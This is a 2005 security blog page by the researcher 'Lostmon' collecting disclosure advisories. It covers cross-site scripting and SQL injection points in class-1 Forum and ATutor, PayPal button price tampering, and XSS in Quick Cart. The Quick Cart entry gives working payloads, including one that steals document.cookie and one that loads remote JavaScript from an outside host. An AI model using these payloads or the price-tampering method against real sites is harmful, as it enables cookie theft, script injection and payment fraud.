class-1 Forum Software Cross site scripting

Thursday, July 14, 2005
#########################################################
class-1 Forum Software Cross site scripting.
Original advisore:http://lostmon.blogspot.com/2005/07/
class-1-forum-software-cross-site.html
Vendor url:http://www.class1web.co.uk/download_forum.php
Vendor notify: yes exploit available: yes
OSVDB ID:17920,17921,17922,17923
Secunia: SA16078
BID: 14261
Securitytracker: 1014485 1014486
##########################################################


class-1 Forum Software is a PHP/MySQL driven web forum

class-1 Forum contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'viewuser_id' and 'group' variables upon
submission to 'users.php' script.This could allow a user to create
a specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and
the server,leading to a loss of integrity

##################
versions
##################

class-1 Forum Software (v 0.23.2) vulnerable.
class-1 Forum Software (v 0.24.4) vulnerable.

it is posible that other versions are vulnerables too.

Clever Copy (http://clevercopy.bestdirectbuy.com/)
with forums module afected instaled.

Clever Copy 2.0
Clever Copy 2.0a

###################
Solution
###################

no solution at this time.

################
Timeline
################

discovered: 10-07-2005
vendor notify: 12-07-2005 (Webform)
vendor response:
2 vendor response:12-07-2005 (Clever Copy)
disclosure: 14-07-2005


##############################
proof of Cross site Scripting
##############################

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]

http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]


#########################
posible SQL injections
#########################

http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]

SQL Error
There was an error executing the query - SELECT * FROM attachments
WHERE attach_id='''
You have an error in your SQL syntax near ''''' at line 1

-------

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]

There was an error executing the query - SELECT * FROM users
WHERE user_id='''
You have an error in your SQL syntax near ''''' at line 1

--------

http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]

There was an error executing the query - SELECT * FROM messages
WHERE id='''
You have an error in your SQL syntax near ''''' at line 1

---------

http://[victim]/forum/viewforum.php?forum=[SQL-Injection]

There was an error executing the query - SELECT * FROM group_permissions
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1

----------
#################### €nd ###########################

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

ATutor multiple variable Cross site scripting

Wednesday, June 15, 2005
################################################
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORE:http://lostmon.blogspot.com/2005/06/
atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
OSVDB ID:17351,17352,17353,17354,17355
17356,17357,17358,17359.
Secunia: SA15705
Securitytracker: 1014216
BID: 13972
################################################

ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.

ATutor contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. script.This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


###########
versions:
###########

ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
ATutor 1.5 RC 2 vulnerable
Atutor 1.5 RC 3 not tested

#############
solution
#############

Upgrade to version ATutor 1.5RC3 or higher, as it has been
reported to fix this vulnerability. An upgrade is required
as there are no known workarounds.


##############
timeline
##############

discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
vendor response: 27-06-2005
disclosure: 16-06-2005


##################
Proof of concepts
##################

http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]

http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]

http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]

http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]

http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search

http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results

http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search

http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search

http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]

for exploting some flaws , need a client login.
Others scripts and others variables are vulnerable
to the same style attack.


############### €nd ##############

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

PayPal arbitrary price manipulation

Monday, May 30, 2005
##############################################
PayPal 'butons' price manipulation.
vendor url:https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/
paypal-arbitrary-price-manipulation.html
vendor notify: yes exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################

PayPal buttons are prone to price manipulation.
all stores based on PayPal buttons are posible
vulnerables to this flaw.


##########################
code example of a button
##########################
the proof is based on this form:

https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside

in the exmple of explotation we used "PayPal price manipulation kit " program to shop.
This is Non existent product...

the link of the button for shopping have this url:
(1)
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15


this is the normal price for the product (19.90$) but...
if we change 'amount' variable to 0.01 the product now cost 0.01$

https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15

another way to exploiting this situation:

(2)
this other example coming from a stored based on paypal:

https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+ kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD

if we look we can change not only the price , we can change the email account
name of product, and other details.
for shopping you need an account on PayPal.

#############
timeline:
#############

discovered: 14 may 2005
vendor notify: 25 may 2005
Vendor response: 26 may 2005
disclosure: 27 may 2005
Public disclosure: 30 may 2005


################### End ####################

thnx to estrella to be my ligth
thnx to icaro he is my support
Thnx to FalconDeOro ... patience.
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!

contact to FalconDeOro
(falcondeoro@gmail.com)
http://falcondeoro.blogspot.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick Cart Search field cross site scripting and script insercion

Sunday, May 29, 2005
#####################################################
Quick Cart Search field cross site scripting and script insercion
vendor url:http://www.quickcart.com/
advisore:http://lostmon.blogspot.com/2005/05/
quick-cart-search-field-cross-site.html
vendor notify: yes exploit available: yes
Securitytracker:1014076
#####################################################

Quick Cart contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate the 'search' field upon
submission to 'search.cfm' script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


############
versions
############

free edition affected:
https://www.quickcart.com/qc_checkout.cfm


but is posible other versions ( standar or others) are afected


################
solution
################

no solution was available at this time

#############
Timeline
#############

discovered: 10 may 2005
vendor notify: 27 may 2005
vendor response: 27 may 2005
disclosure: 29 may 2005

##############
exploit
##############

put in the search box of the store:

//"><script>alert(document.cookie)</script>

or

//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script>

and the script is executing , this is a XSS flaw
and a posible script insercion


#################### €nd ###################

Thnx to http://www.drorshalev.com for this script
and for hosting it for this demostration.

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends